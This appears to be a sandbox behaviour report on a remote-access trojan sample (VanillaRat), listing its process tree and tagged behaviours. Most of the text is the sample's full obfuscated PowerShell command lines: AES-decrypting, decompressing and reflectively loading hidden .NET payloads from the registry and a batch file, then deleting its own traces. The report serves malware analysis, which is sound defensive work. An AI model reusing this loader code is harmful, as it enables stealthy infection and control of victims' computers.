[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Hide Artifacts: Hidden Window
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3140
    - - C:\Windows\SysWOW64\dllhost.exe
        
        C:\Windows\SysWOW64\dllhost.exe /Processid:{e7bc4198-1eea-4999-9025-1b21a802bc4a}
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2880
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3140).WaitForExit();[System.Threading.Thread]::Sleep(5000); function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1404
      - C:\Windows\SysWOW64\dllhost.exe
        
        C:\Windows\SysWOW64\dllhost.exe /Processid:{780e673d-6db3-4954-ae44-c01d58bd29e4}
        6⤵
        
        PID:5248
    - - C:\Windows\SysWOW64\dllhost.exe
        
        C:\Windows\SysWOW64\dllhost.exe /Processid:{ab669555-1861-4cd5-bb82-f900b9024d77}
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2600
    - - C:\Windows\SysWOW64\dllhost.exe
        
        C:\Windows\SysWOW64\dllhost.exe /Processid:{31e4bd32-ecb1-447b-ba19-fb7c88d83439}
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5768
    - - C:\Windows\SysWOW64\dllhost.exe
        
        C:\Windows\SysWOW64\dllhost.exe /Processid:{519bd706-2191-4464-9c0e-f597a8cfe5c9}
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1788
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 480
        6⤵
        Program crash
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5140
    - - C:\Windows\SysWOW64\dllhost.exe
        
        C:\Windows\SysWOW64\dllhost.exe /Processid:{b5dcbc06-7a0e-4b61-98f3-555610136be3}
        5⤵
        
        PID:5844
    - - C:\Windows\SysWOW64\dllhost.exe
        
        C:\Windows\SysWOW64\dllhost.exe /Processid:{61efd6de-ac99-456f-9f47-e74f02889d8a}
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4712
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3140 -s 1096
        5⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1272

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1376
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1436

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1588

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1896

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1800

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1836

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2132

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2260

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2480

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2524

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:2548

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2568

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2396

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2096

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3296
- C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe
  "C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1656
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -WindowStyle Hidden -command "& {Start-Process -FilePath 'Handlers\Handler.bat' -WindowStyle Hidden -Wait}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3112
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3980
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2460
    - - C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
        
        "Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4644
      - C:\Windows\SysWOW64\dllhost.exe
        
        C:\Windows\SysWOW64\dllhost.exe /Processid:{5bceada9-83a7-4a7b-b04b-6941595c7e5c}
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2700
      - C:\Windows\SysWOW64\dllhost.exe
        
        C:\Windows\SysWOW64\dllhost.exe /Processid:{f340cd86-ca5c-45a4-bf7d-667d6f3d75af}
        6⤵
        
        PID:3896
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & exit
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5728
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5776
        
        C:\Windows\system32\PING.EXE
        
        PING localhost -n 8
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3472

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3848

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3916

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
